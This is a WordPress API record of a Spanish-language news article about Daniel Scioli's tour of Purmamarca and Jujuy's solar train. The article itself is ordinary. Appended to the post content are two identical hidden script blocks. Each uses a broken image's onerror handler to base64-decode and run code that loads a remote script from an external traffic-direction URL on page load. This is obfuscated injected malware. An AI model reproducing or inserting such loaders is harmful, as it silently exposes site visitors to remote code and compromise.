{"id":4340,"date":"2024-08-26T09:10:54","date_gmt":"2024-08-26T12:10:54","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4340"},"modified":"2025-08-13T23:50:08","modified_gmt":"2025-08-14T02:50:08","slug":"scioli-el-tren-solar-es-una-sintesis-de-la-nueva-matriz-productiva-en-jujuy","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4340","title":{"rendered":"Scioli: \u201cEl tren solar es una s\u00edntesis de la nueva matriz productiva en Jujuy\u201d"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-01d81d60a4bc8c96c029805405176896\" style=\"background-color:#840840\"><em>Lo expres\u00f3 en el contexto del nuevo aniversario del \u00c9xodo Juje\u00f1o.<\/em><\/h3>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes,&nbsp;<strong>Daniel Scioli<\/strong>, particip\u00f3 esta ma\u00f1ana de una recorrida por la localidad de&nbsp;<strong>Purmamarca<\/strong>, Jujuy, acompa\u00f1ado por la subsecretaria de Turismo,&nbsp;<strong>Yanina Mart\u00ednez<\/strong>. En el marco del aniversario n\u00famero&nbsp;<strong>212 del \u00c9xodo Juje\u00f1o<\/strong>, los funcionarios tambi\u00e9n estuvieron en&nbsp;<strong>Volc\u00e1n<\/strong>&nbsp;-lugar al que arribaron mediante el&nbsp;<strong>tren solar que opera en la Quebrada de Humahuaca<\/strong>-, en Lozano y conocieron el ecoparque&nbsp;<strong>Los Coat\u00edes<\/strong>, ubicado en San Salvador de Jujuy.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"571\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/08\/Captura-web_26-8-2024_9950_www.argentina.gob_.ar_-1024x571.jpeg\" alt=\"\" class=\"wp-image-4342\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/08\/Captura-web_26-8-2024_9950_www.argentina.gob_.ar_-1024x571.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/08\/Captura-web_26-8-2024_9950_www.argentina.gob_.ar_-300x167.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/08\/Captura-web_26-8-2024_9950_www.argentina.gob_.ar_-768x428.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/08\/Captura-web_26-8-2024_9950_www.argentina.gob_.ar_-753x420.jpeg 753w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/08\/Captura-web_26-8-2024_9950_www.argentina.gob_.ar_-696x388.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/08\/Captura-web_26-8-2024_9950_www.argentina.gob_.ar_-1068x596.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/08\/Captura-web_26-8-2024_9950_www.argentina.gob_.ar_.jpeg 1357w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>En relaci\u00f3n con Purmamarca,&nbsp;<strong>Scioli<\/strong>&nbsp;destac\u00f3 al sitio por&nbsp;<em>\u201csus paisajes, cultura, artesan\u00eda y m\u00fasica\u201d<\/em>, y record\u00f3 que hace m\u00e1s de 20 a\u00f1os que la Quebrada de Humahuaca fue declarada&nbsp;<strong>Patrimonio Mundial de la UNESCO<\/strong>.<\/p>\n\n\n\n<p>Adem\u00e1s, el&nbsp;<strong>secretario nacional<\/strong>&nbsp;se refiri\u00f3 al viaje en el tren solar como&nbsp;<em>\u201cuna experiencia \u00fanica y sostenible para explorar la impresionante regi\u00f3n\u201d<\/em>.&nbsp;<em>\u201cEs una s\u00edntesis de la nueva matriz productiva de Jujuy. Energ\u00eda solar que alimenta el tren, bater\u00edas de litio y turismo: un sector que pas\u00f3 en pocos a\u00f1os de 18000 a 28000 trabajadores\u201d<\/em>, remarc\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2024-08-23_at_17.09.30.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Cabe indicar que dicho tren transita 42 km, con paradas en las estaciones de&nbsp;<strong>Volc\u00e1n, Tumbaya, Purmamarca, Maimar\u00e1 y Tilcara<\/strong>. Con capacidad para&nbsp;<strong>72 pasajeros<\/strong>, comenz\u00f3 a hacer el recorrido completo el 18 junio.<\/p>\n\n\n\n<p>Por su parte,&nbsp;<strong>Mart\u00ednez<\/strong>&nbsp;expres\u00f3:&nbsp;<em>\u201cEl turista que visita la Puna, la vuelve a elegir por la calidez de su gente\u201d<\/em>. Tambi\u00e9n manifest\u00f3 la importancia de resaltar&nbsp;<em>\u201cla autenticidad de la regi\u00f3n\u201d<\/em>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2024-08-23_at_17.09.31.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>La agenda de la visita incluy\u00f3 la entrega del certificado de postulaci\u00f3n&nbsp;<strong>Best Tourism Villages 2024<\/strong>&nbsp;a la localidad juje\u00f1a de&nbsp;<strong>Barrancas<\/strong>, realizada ayer por Mart\u00ednez. Se trata de una iniciativa de&nbsp;<strong>ONU Turismo<\/strong>&nbsp;que distingue a pueblos considerados ejemplo de destinos de&nbsp;<strong>turismo rural en el mundo<\/strong>, cuyos ganadores se dar\u00e1n a conocer hacia el final de este a\u00f1o. Son 9 los pueblos argentinos candidatos en 2024.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/scioli-el-tren-solar-es-una-sintesis-de-la-nueva-matriz-productiva-en-jujuy\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:283px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Lo expres\u00f3 en el contexto del nuevo aniversario del \u00c9xodo Juje\u00f1o. El secretario de Turismo, Ambiente y Deportes,&nbsp;Daniel Scioli, particip\u00f3 esta ma\u00f1ana de una recorrida por la localidad de&nbsp;Purmamarca, Jujuy, acompa\u00f1ado por la subsecretaria de Turismo,&nbsp;Yanina Mart\u00ednez. En el marco del aniversario n\u00famero&nbsp;212 del \u00c9xodo Juje\u00f1o, los funcionarios tambi\u00e9n estuvieron en&nbsp;Volc\u00e1n&nbsp;-lugar al que arribaron mediante [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4341,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-4340","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4340"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4340"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4340\/revisions"}],"predecessor-version":[{"id":6703,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4340\/revisions\/6703"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4341"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4340"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4340"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4340"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}